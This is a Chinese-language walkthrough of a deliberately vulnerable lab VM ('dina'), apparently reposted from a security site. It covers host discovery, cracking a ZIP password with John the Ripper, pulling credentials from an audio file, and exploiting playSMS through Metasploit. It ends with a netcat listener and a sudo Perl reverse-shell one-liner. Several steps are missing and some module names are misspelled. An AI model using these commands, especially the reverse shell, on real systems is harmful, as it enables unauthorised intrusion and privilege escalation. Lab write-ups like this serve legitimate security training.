1、下载靶机 .ova文件,更改网络配置,切换为NET链接。
步骤:选择dina虚拟机,点击“编辑虚拟机设置”,选择“网络适配器”,更改网络连接模式为“net模式” ,确定后开启虚拟机。

2、确定在kali攻击机中通过ifconfig查看本机IP。本机IP地址为192.168.42.131。
3、使用netdiscover -r 192.168.42.0/24进行ARP主机探测。







8、使用John The Ripper对密码加密的ZIP包进行爆破。(注意,john对同一个加密文件之后执行一次,执行多次后会如图所示)
步骤:zip2john backup.zip> backup.john
john –format=zip backup.john –wordlist500-worst-passwords.txt
密码为:freedom


解决方法:尝试安装7z 。
sudo apt-get install p7zip-full


命令:strings backup-cred.mp3

uname:touhid
password:******
10、访问该URL。用户名:touhid。密码未知。



12、我们通过访问主页发现该页面使用playsms(基于web的短信平台)系统。通过msfconsole控制台查看利用相关漏洞。
步骤:
(1)使用“msfconsole“进入matesploit管理。
(2)使用“search palysms”查找playsms相关模块漏洞。
(3)使用use exploit/multi/http/[laysms_filename_exec 进行漏洞利用。
配置渗透攻击模块中的参数。
(4)如图,使用set命令进行如下参数设置。


nc -nvlp 1234

sudo perl -e ‘use Socket;$i=”192.168.42.135″;$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname(“tcp”));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,”>&S”);open(STDOUT,”>&S”);open(STDERR,”>&S”);exec(“/bin/sh-i”);};’


来源:freebuf.com 2019-01-04 15:19:27 by: 凯信特安全团队


